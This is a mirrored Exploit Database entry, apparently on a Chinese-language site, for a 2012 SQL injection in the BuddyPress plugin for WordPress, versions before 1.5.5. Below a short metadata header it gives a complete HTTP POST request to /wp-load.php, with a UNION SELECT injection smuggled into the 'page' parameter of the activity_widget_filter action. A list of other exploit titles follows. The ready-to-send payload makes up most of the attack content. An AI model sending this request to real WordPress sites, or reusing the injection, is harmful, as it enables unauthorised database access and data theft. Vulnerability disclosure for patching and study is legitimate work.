WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection

Exploit Database
84 阅读

作者： Ivan Terkin

日期： 2012-03-31
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18690/

# Exploit Title: Buddypress plugin of WordPress remote SQL Injection
# Date: March 31, 2012
# Author: Ivan Terkin
# Exploitation: Remote Exploit
# Bug: Remote SQL Injection
# Software Link: buddypress.org
# Version: till 1.5.5
# Tested on: Buddypress 1.5.4


POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

Reported to developers and fixed in version 1.5.5

last Exploits
WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection的更多信息

InfraPower PPS-02-S Q213V1 – Multiple Cross-Site Scripting Vulnerabilities：
HooToo Tripmate HT-TM01 2.000.022 – Cross-Site Request Forgery：
PodHawk 1.85 – Arbitrary File Upload：
Acunetix Web Vulnerability Scanner – DLL Loading Arbitrary Code Execution：
EQ Enterprise management system v2.2.0 – SQL Injection：
WordPress Plugin CommentLuv – ‘_ajax_nonce’ Cross-Site Scripting：
vBshop – Multiple Persistent Cross-Site Scripting Vulnerabilities：
ConverTo Video Downloader & Converter 1.4.1 – Arbitrary File Download：